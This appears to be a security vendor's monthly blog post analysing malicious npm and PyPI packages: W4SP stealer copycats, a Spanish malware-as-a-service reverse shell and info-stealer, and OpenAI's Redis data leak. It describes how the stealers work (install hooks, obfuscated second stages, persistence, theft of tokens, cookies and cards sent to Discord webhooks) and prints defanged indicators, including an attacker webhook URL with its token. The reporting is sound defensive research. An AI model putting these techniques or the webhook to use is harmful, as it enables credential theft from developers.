Welcome to a new issue of Malware Monthly, where we collaborate with our team of security researchers to provide an in-depth look at the different types of malware we’ve detected and how they can impact your system.
This month, we'll dive deep into a series of malicious packages uploaded to the PyPI registry identified as information stealers, some of them copies of the popular W4SP stealer we’ve been tracking. We'll also explore a malicious package called reverse-shell that’s part of a global malware-as-a-service (MaaS) initiative, and a data leak incident experienced by OpenAI leading to the first western country ban of ChatGPT.
In terms of volume, in March we caught a total of 6,933 malicious packages.
Some of the node packages we caught on npm, such as segment-js-sdk, product-api-ts-axios-sdk, and account-api-ts-axios-sdk, published under the scope 12build, contain lightly obfuscated code in the file build.js that exfiltrates the environment variables to a “pipedream.net” address. Other packages, including ibd-ui-component-library, fortnox-react, otc-trading-desk, payments-js, f0-content-parser, and typeahead-client-logger followed the very same pattern. In terms of PyPI, we wanted to dive deeper into the most recent info-stealers we found: microsoft-helper and reverse-shell.
Arm yourself with the latest news and insights on the world of malware security and how you can properly protect your team’s build environment from potential risks.
Ain't no rest for the W4SP copycats
After our initial report on a series of malicious packages uploaded to the PyPI registry that we investigated and identified as info-stealer trojans, we observed a continuation of this trend throughout the month of March. We’re talking about these packages being copycats of the popular W4SP stealer, an ongoing risk to the open-source software supply chain.
These types of packages are a cause for concern as they pose a serious threat to developers who may inadvertently download and install them. Given the potential danger involved, we reported them to the PyPI team and they took them down promptly and proficiently. Nevertheless, we wanted to dive deeper and examine one of the malicious packages post-mortem in order to gain a better understanding of how they operate.
Armed with our gloves and surgical instruments, let’s delve deeper into the intricacies of a package called microsoft-helper and then we’ll examine its near cousin, pyezstyle, which will only appear briefly.
As it’s usually the case, bad actors added a line in setup.py so that when developers run pip install they deploy the malware.
The name of the package, microsoft-helper, might be the bad actors’ attempt to disguise its malicious nature, maybe with the goal of potentially adding it as a dependency of a popular package they’ve already owned. However, the author’s name, composed by abbreviations, didn’t even try to pretend it was from a legit author:
When developers inadvertently execute the payload, it will grab a remote script from the URL https[:]//paste[.]bingner[.]com/paste/rg8v8/raw that contains the second-stage payload. At the time of this writing, that URL is active. However, the Discord webhook —which, unlike the other copycats we’ve analyzed, was moved to the top of the code— returns a JSON file with a “code: 10015” error message, indicating that the webhook was now invalid or outdated.
So now let’s change to another package: the nearly duplicate pyezstyle. If we compare the two second-stage payloads, there’s only one difference: the Discord webhook URL: https[:]//discord[.]com/api/webhooks/1087680971081519124/FAYiwvOu4N_raBxx6JAs9GQHtjLBqJK6yBJXKXlHi5xJ2g3QKtxLQDqe_ccFBYULwlys. This one doesn’t return an error message, and by looking at the guild_id, we find that the channel was created on March 21, 2023. So this is the one that’s still active.
Anyway, that’s it from pyezstyle, we told you it was only going to appear briefly, so let’s switch back to microsoft-helper.
Another thing we noticed is that the bad actors modified the second-stage payload we had initially accessed. This is a known practice: on top of making the malicious code less visible, adding a second-stage payload allows more flexibility since it’s easier to modify the code without having to redo everything from scratch.
In microsoft-helper we witnessed how the name “Fade Stealer”, itself a copycat of W4SP stealer, was modified to “EVIL$ Stealer”. A new name to add to the list of copycat info-stealers after “Satan Stealer,” “ANGEL Stealer,” “Leaf $tealer,” “@skid STEALER,” “Fade Stealer,” “Celestial Stealer,” and “Creal Stealer.” It's a copy of a copy of a copy.
Spanish squad enter the MaaS market
If you’re a software developer perusing the PyPI registry, you’d do a double take when stumbling upon a package called reverse-shell. Of course, you wouldn’t deliberately pip install something named after an attack technique — unless you're doubling as a security researcher, and in that case, we’re sure you’d be looking from within the safe confines of a virtual machine.
So why would someone name a malicious package in such an blatantly obvious way? Bad actors usually hide their intent by naming their packages after popular libraries or company names so it was disconcerting when our security researchers found this one. No typosquatting attempt here. No dependency confusion. Maybe these bad actors are just testing the waters for something else...
And when we looked at setup.py, we found something even stranger: detailed tutorial-like comments in Spanish. “Clone GitHub repository and execute file”, “replace with URL of your GitHub repository", “path where you want to clone the repo”, etc. It seems we were in front of either a hacking tutorial for beginners or a MaaS offering for the Spanish-speaking market.
The repository URL referenced in the code belonging to a user called “NotInfected” is no longer active. But another repo associated with this code is still active as of now. We’ll reveal the name of that repo at the right time, so bear with us.
Even though the package reverse-shell doesn’t look malicious at first glance, the file that it executes from GitHub, bypass.py, and consequently, WindowsDefender.py, are nothing but nefarious.
Hosting malicious files on a public repository provides bad actors more control over them. It gives them the power of deleting, upgrading, or even doing version control of the payload.
Such is the case of bypass.py. The code has some light obfuscation, possibly to evade static code analysis tools or just hide the malicious code from developers:
They’re encoding the script as a series of numbers that correspond to the ASCII codes of the characters in said script. These codes then are joined together using the .join() method. By simply changing the exec method for print, human-readable code is suddenly revealed:
The code defines the function add_to_startup as a persistence access mechanism: it adds the application to the Windows Registry so that it launches automatically every time Windows starts. It also adds the file WindowsDefender.py —hosted on NotInfected’s GitHub— to the Windows startup folder and it constructs the correct path for the file. Finally, it uses subprocess.run() to execute the WindowsDefender.py script.
Okay, that’d be it from bypass.py. Let’s explore WindowsDefender.py to see where it takes us.
After going through the same deobfuscation method described above, static analysis revealed the ill-nature of the Python code. The tutorial aspect is gone —no detailed comments this time— so this one is not supposed to be modified by their MaaS clients.
What we’re dealing with here is an “info-stealer”: a piece of malware that’s designed to exfiltrate sensitive information. Here’s how it works:
The get_token() function retrieves Discord authentication tokens stored in the local storage of various web browsers and attempts to decrypt them using the master key. Other functions, including get_login_data(), get_web_history(), get_downloads(), get_cookies(), and get_credit_cards(), perform what their names suggest before sending all the information to a webhook in a Discord channel.
After grabbing data from the web browsers, the code takes a screenshot of the user's desktop using the ImageGrab.grab() function from the Python Imaging Library (PIL). The screenshot is saved to the temporary directory and uploaded to the same Discord webhook.
The code also checks if the Steam gaming platform is installed on the user's system. If so, it zips up the config directory and any SSFN files (authentication tokens) in the Steam installation directory. The zipped files are then uploaded to the Discord webhook where an attacker will have everything they need to take control of the Steam account.
As you can see, it checks all the boxes for a sophisticated info-stealer. And within the code, we also found text strings that indicate that the actor behind this might be a group called SylexSquad:
Remember that repo we mentioned earlier that’s still active? It belongs to SylexSquad. The two files we’ve just discussed are hosted there.
A bit of OSINT research reveals that this group was behind a now defunct hacking marketplace on the Sellix platform that was active in 2022.
And like other groups that sell info-stealers, they use YouTube to promote their products with fast-paced, hip-hop/electronic music-themed teaser videos. In one called “DISCORD SYLEXRAT BOT”, they revealed for a quick second the URL of a MediaFire page to download the file GAutoClicker.zip. We, of course, downloaded it — not before noticing that the file was uploaded from Spain:
The use of tutorial-style Spanish language, this piece of metadata, and prices in EUR suggest that the bad actors are from Spain.
Behind this campaign we found three Discord users, two of them with the name Syntax:
And this is where the package sintaxisoyyo makes a brief appearance. On its setup.py there’s nothing malicious: just a notification sent to a Discord webhook with the message: “¡Alguien ha instalado el paquete reverse_shell!” (someone has installed the reverse_shell package). Of course, this is not the reverse-shell package, so yeah, they’re just trying things out. And experiments are often messy: there was a folder in this package called “syntax” with two files: __init__.py and __main__.py. The former, with lightly obfuscated code, turned out to be the same as WindowsDefender.py. And the latter, with no obfuscation, appears to be another product: a Discord bot that executes commands and performs actions on the infected machine. So this is the actual reverse-shell.
The malware can retrieve cookies, take screenshots, run shell commands, steal browsing history, and send all this data to the attacker’s Discord channel. And because this is part of a MaaS offering, a picture is worth a thousand words: ASCII art is printed in the Discord channel as soon as the attackers receive a message announcing that someone has been infected.
We tracked these packages under sonatype-2023-1534 in our data and reported them to the PyPI team, which effectively took them down. We'll keep a close eye on this group's future activities and keep adding any findings to our data so you can stay protected.
ChatGPT, write a section about your latest data leak
We wanted to wrap up this issue with a mention of the data breach OpenAI recently experienced.
An unpatched software bug/vulnerability in an open-source component called Redis led to the leakage of some of its subscribers’ payment-related info and users’ chat queries. OpenAI identified the root cause of the incident to be a race condition vulnerability in Redis, a popular component available in the PyPI repository.
Nevertheless, despite the initial fix that was issued in version 4.5.3 (CVE-2023-28858), some testers were still able to reproduce the flaw, making it unfixed and resulting in a second identifier being assigned to track the flaw (CVE-2023-28859).
This incident, which has motivated arguments for the regulation of AI, led Italy to become the first western country to ban ChatGPT. It also serves as a reminder to be vigilant about race condition vulnerabilities and their potential for exploitation.
Read Ax Sharma’s blog post to find out more.
Automate protection from supply chain attacks
The packages mentioned above just scratch the surface of the volume of malware caught by our tools. Since 2019, we’ve discovered a total of 115,165 packages flagged as malicious, suspicious, or proof-of-concept.
Sonatype’s system uses ML/AI techniques to recognize unusual attributes for newly published components in public repositories. Data delivered via our tooling’s near real-time detection capabilities helps prevent our customers from inadvertently consuming malicious components.
If you want to stay protected from software supply chain attacks, consider Sonatype Repository Firewall to automatically block malicious packages from reaching your development builds.
Written by Sonatype Developer Relations
As Sonatype's Developer Relations team, we empower software developers, infosec practitioners, and DevOps/SRE pros to do their best work.